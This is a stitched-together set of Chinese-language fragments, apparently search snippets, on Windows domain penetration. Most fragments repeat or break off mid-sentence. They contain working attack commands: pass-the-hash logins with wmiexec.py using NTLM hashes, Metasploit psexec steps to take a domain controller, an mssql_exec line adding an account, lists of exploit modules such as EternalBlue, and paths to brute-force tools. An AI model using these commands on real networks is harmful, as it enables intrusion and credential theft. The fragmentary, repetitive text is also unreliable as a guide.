我们的目标是获得域内administrator的hash,然后就可以hash传递,登陆任意域内机器 proxychains wmiexec.py -hashes :42e265xxxxxx62387 administrator@10.10.10.201利用psexec(PTH)上线server-dc到 MSF:proxychains msfconsoleuse exploit/windows/smb/psexecset RHOST 10.10.10.201set SMBUser Administratorset SMBPass aad...
7 exploit/windows/local/ms16_075_reflection_juicy 2016-01-16 great Yes Windows Net-NTLMv2 Reflection DCOM/RPC (Juicy) 8 exploit/windows/local/ms16_014_wmi_recv_notif 2015-12-04 normal Yes Windows WMI Receive Notification Exploit Interact with a modulebyname or index. For example info 8, u...
我们的目标是获得域内administrator的hash,然后就可以hash传递,登陆任意域内机器 proxychains wmiexec.py -hashes :42e265xxxxxx62387 administrator@10.10.10.201 利用psexec(PTH)上线server-dc到 MSF: proxychains msfconsole use exploit/windows/smb/psexec set RHOST 10.10.10.201 set SMBUser Administrator set SMBP...
exploit/windows/smb/ms17_010_eternalblue exploit/windows/smb/webexec auxiliary/admin/smb/webexec_command auxiliary/scanner/smb/impacket/wmiexec auxiliary/admin/mysql/mysql_enum auxiliary/admin/mysql/mysql_sql auxiliary/scanner/mysql/mysql_login auxiliary/scanner/mysql/mysql_hashdump exploit/windows/mysql...
Interact with a module by name or index. For example info 8, use 8 or use exploit/windows/local/ms16_014_wmi_recv_notif msf6 exploit(multi/handler) > use exploit/windows/local/ms16_016_webdav [*] No payload configured, defaulting to windows/meterpreter/reverse_tcp ...
use auxiliary/admin/mssql/mssql_exec set cmd net user pass /add ftp ftp版本扫描 use auxiliary/scanner/ftp/ftp_version use auxiliary/scanner/ftp/anonymous use auxiliary/scanner/ftp/ftp_login vnc VNC:虚拟网络控制台,是一款优秀的远程控制工具软,基于 UNIX 和 Linux 操作系统的免费的开源软件,远程控制...
generate_mof 函数,生成 mof 文件,mof 文件内,通过操作 WMI 运行特定程序 lib/msf/core/exploit/wbem_exec.rb 目标主机文件落地情况 exploit ms17_010_eternalblue exploit/windows/smb/ms17_010_eternalblue 模块 EternalBlue SMB Remote Windows Kernel Pool Corruption ...
获取到的hash后利用impacket中的wmiexec.py脚本进行登录, 成功拿到shell:python wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:028b70314013e1372797cff51298880e redteam.red/administrator@10.10.10.8 -codec gbk. 此时, 成功获取到了域控的shell. 但是这个shell并不是稳定的, 真实环境中我们还需要...
14 auxiliary/scanner/smb/impacket/wmiexec 2018-03-19 normal No WMI Exec 1. 2. 3. 4. 5. 6. 7. 8. 9. 10. 11. 12. 13. 14. 15. 16. 17. 18. 19. 20. 21. 4.3 使用 Nmap 扫描 在Metasploit中同样可以使用Nmap扫描,它不仅可以用来确定目标网络上计算机的存活状态,而且可以扫描计算机的操作...
NTscan扫描工具汉化版,ipc/smb/wmi弱口令暴破 //F:\pt007\f\security\批量135入侵工具包\ntscaner //windows系统弱口令破解,用内网渗透中获得的密码来生成一个字典文件进行测试。 3389密码暴破 //用内网渗透中获得的密码来生成一个字典文件进行测试: F:\pt007\f\2000hole\3389相关工具\fastrdpbrute1.1.2 ...